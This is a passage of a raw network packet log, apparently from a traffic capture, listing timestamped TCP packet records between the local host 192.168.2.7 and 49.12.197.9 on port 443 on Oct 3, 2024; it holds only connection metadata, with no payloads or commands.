                                                                                                                          Oct 3, 2024 03:27:08.919549942 CEST57962443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:08.919559002 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:08.919600010 CEST57962443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:08.929091930 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:08.929106951 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:08.929202080 CEST57962443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:08.929212093 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:08.929261923 CEST57962443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:08.938652039 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:08.938668013 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:08.938735962 CEST57962443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:08.938746929 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:08.938802958 CEST57962443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:08.945463896 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:08.945477009 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:08.945530891 CEST57962443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:08.945538998 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:08.945573092 CEST57962443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:08.959462881 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:08.959477901 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:08.959536076 CEST57962443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:08.959546089 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:08.959585905 CEST57962443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:08.965241909 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:08.965254068 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:08.965310097 CEST57962443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:08.965317965 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:08.965362072 CEST57962443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:08.986934900 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:08.986949921 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:08.987004995 CEST57962443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:08.987015963 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:08.987057924 CEST57962443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:08.987057924 CEST57962443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:08.998663902 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:08.998678923 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:08.998720884 CEST57962443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:08.998734951 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:08.998749971 CEST57962443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:08.998776913 CEST57962443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:09.008944988 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:09.008960009 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:09.009016991 CEST57962443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:09.009026051 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:09.009068966 CEST57962443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:09.019731045 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:09.019745111 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:09.019843102 CEST57962443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:09.019853115 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:09.019895077 CEST57962443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:09.031214952 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:09.031229019 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:09.031342030 CEST57962443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:09.031352997 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:09.031433105 CEST57962443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:09.036474943 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:09.036488056 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:09.036573887 CEST57962443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:09.036581993 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:09.036640882 CEST57962443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:09.050843000 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:09.050858974 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:09.050918102 CEST57962443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:09.050929070 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:09.050973892 CEST57962443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:09.057691097 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:09.057719946 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:09.057755947 CEST57962443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:09.057765961 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:09.057786942 CEST57962443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:09.057809114 CEST57962443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:09.077528000 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:09.077543974 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:09.077625990 CEST57962443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:09.077636003 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:09.077728987 CEST57962443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:09.089809895 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:09.089823008 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:09.090014935 CEST57962443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:09.090023041 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:09.090159893 CEST57962443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:09.102137089 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:09.102152109 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:09.102324963 CEST57962443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:09.102333069 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:09.102380037 CEST57962443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:09.111737967 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:09.111751080 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:09.111809015 CEST57962443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:09.111816883 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:09.111852884 CEST57962443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:09.120215893 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:09.120229006 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:09.120285988 CEST57962443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:09.120294094 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:09.120337009 CEST57962443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:09.126904011 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:09.126916885 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:09.126965046 CEST57962443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:09.126972914 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:09.127022982 CEST57962443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:09.140949011 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:09.140963078 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:09.141032934 CEST57962443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:09.141041040 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:09.141189098 CEST57962443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:09.148900032 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:09.148915052 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:09.148979902 CEST57962443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:09.148988008 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:09.149027109 CEST57962443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:09.168574095 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:09.168602943 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:09.168776035 CEST57962443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:09.168782949 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:09.168833971 CEST57962443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:09.180666924 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:09.180690050 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:09.180831909 CEST57962443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:09.180867910 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:09.180919886 CEST57962443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:09.192723036 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:09.192743063 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:09.192817926 CEST57962443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:09.192826986 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:09.192878008 CEST57962443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:09.202545881 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:09.202564001 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:09.202656984 CEST57962443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:09.202672005 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:09.202748060 CEST57962443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:09.210791111 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:09.210804939 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:09.210880995 CEST57962443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:09.210887909 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:09.210923910 CEST57962443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:09.223392010 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:09.223404884 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:09.223566055 CEST57962443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:09.223572969 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:09.223623991 CEST57962443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:09.231709003 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:09.231728077 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:09.231795073 CEST57962443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:09.231801033 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:09.231837034 CEST57962443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:09.237770081 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:09.237782955 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:09.237857103 CEST57962443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:09.237864017 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:09.237910986 CEST57962443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:09.259344101 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:09.259358883 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:09.259569883 CEST57962443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:09.259576082 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:09.259629965 CEST57962443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:09.271311998 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:09.271325111 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:09.271411896 CEST57962443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:09.271419048 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:09.271460056 CEST57962443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:09.283557892 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:09.283574104 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:09.283677101 CEST57962443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:09.283687115 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:09.283729076 CEST57962443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:09.293430090 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:09.293447971 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:09.293519974 CEST57962443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:09.293531895 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:09.293574095 CEST57962443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:09.301793098 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:09.301806927 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:09.301904917 CEST57962443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:09.301913023 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:09.301961899 CEST57962443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:09.313576937 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:09.313595057 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:09.313697100 CEST57962443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:09.313704967 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:09.313766956 CEST57962443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:09.322623014 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:09.322638035 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:09.322717905 CEST57962443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:09.322726965 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:09.322768927 CEST57962443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:09.328666925 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:09.328680992 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:09.328763962 CEST57962443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:09.328773975 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:09.328821898 CEST57962443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:09.349993944 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:09.350009918 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:09.350089073 CEST57962443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:09.350102901 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:09.350147009 CEST57962443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:09.365259886 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:09.365273952 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:09.365443945 CEST57962443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:09.365451097 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:09.365504980 CEST57962443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:09.386661053 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:09.386676073 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:09.386805058 CEST57962443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:09.386811972 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:09.386975050 CEST57962443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:09.394500971 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:09.394514084 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:09.394577026 CEST57962443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:09.394582987 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:09.394625902 CEST57962443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:09.396893024 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:09.396910906 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:09.396964073 CEST57962443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:09.396970987 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:09.397008896 CEST57962443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:09.404001951 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:09.404078007 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:09.404103994 CEST57962443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:09.404110909 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:09.404139996 CEST57962443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:09.404160023 CEST57962443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:09.413832903 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:09.413875103 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:09.413917065 CEST57962443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:09.413929939 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:09.413943052 CEST57962443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:09.413964033 CEST57962443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:09.419181108 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:09.419224977 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:09.419264078 CEST57962443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:09.419270039 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:09.419292927 CEST57962443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:09.419313908 CEST57962443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:09.441128969 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:09.441174030 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:09.441313982 CEST57962443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:09.441345930 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:09.441397905 CEST57962443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:09.456657887 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:09.456732035 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:09.456763029 CEST57962443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:09.456775904 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:09.456800938 CEST57962443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:09.456818104 CEST57962443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:09.456876040 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:09.456989050 CEST57962443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:09.457498074 CEST57962443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:09.457515955 CEST4435796249.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:09.993115902 CEST57963443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:09.993159056 CEST4435796349.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:09.993242025 CEST57963443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:09.993459940 CEST57963443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:09.993474007 CEST4435796349.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:10.650268078 CEST4435796349.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:10.650405884 CEST57963443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:10.650919914 CEST57963443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:10.650928974 CEST4435796349.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:10.653345108 CEST57963443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:10.653345108 CEST57963443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:10.653354883 CEST4435796349.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:10.653373003 CEST4435796349.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:11.385039091 CEST4435796349.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:11.385113001 CEST57963443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:11.385149002 CEST4435796349.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:11.385201931 CEST57963443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:11.385211945 CEST4435796349.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:11.385255098 CEST57963443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:11.385296106 CEST4435796349.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:11.385394096 CEST57963443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:11.394002914 CEST57963443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:11.394021034 CEST4435796349.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:11.397833109 CEST57964443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:11.397871017 CEST4435796449.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:11.397953987 CEST57964443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:11.398716927 CEST57964443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:11.398735046 CEST4435796449.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:12.316081047 CEST4435796449.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:12.316185951 CEST57964443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:12.316750050 CEST57964443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:12.316756964 CEST4435796449.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:12.318345070 CEST57964443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:12.318351984 CEST4435796449.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:13.030716896 CEST4435796449.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:13.030771971 CEST4435796449.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:13.030808926 CEST57964443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:13.030822992 CEST4435796449.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:13.030839920 CEST57964443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:13.030879974 CEST57964443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:13.030925035 CEST4435796449.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:13.030982971 CEST57964443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:13.031217098 CEST57964443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:13.031229973 CEST4435796449.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:13.035403013 CEST57965443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:13.035438061 CEST4435796549.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:13.035774946 CEST57965443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:13.035774946 CEST57965443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:13.035806894 CEST4435796549.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:13.692724943 CEST4435796549.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:13.692924976 CEST57965443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:13.693556070 CEST57965443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:13.693561077 CEST4435796549.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:13.694983006 CEST57965443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:13.694988012 CEST4435796549.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:14.417783976 CEST4435796549.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:14.417841911 CEST4435796549.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:14.417989016 CEST4435796549.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:14.418009996 CEST57965443192.168.2.749.12.197.9
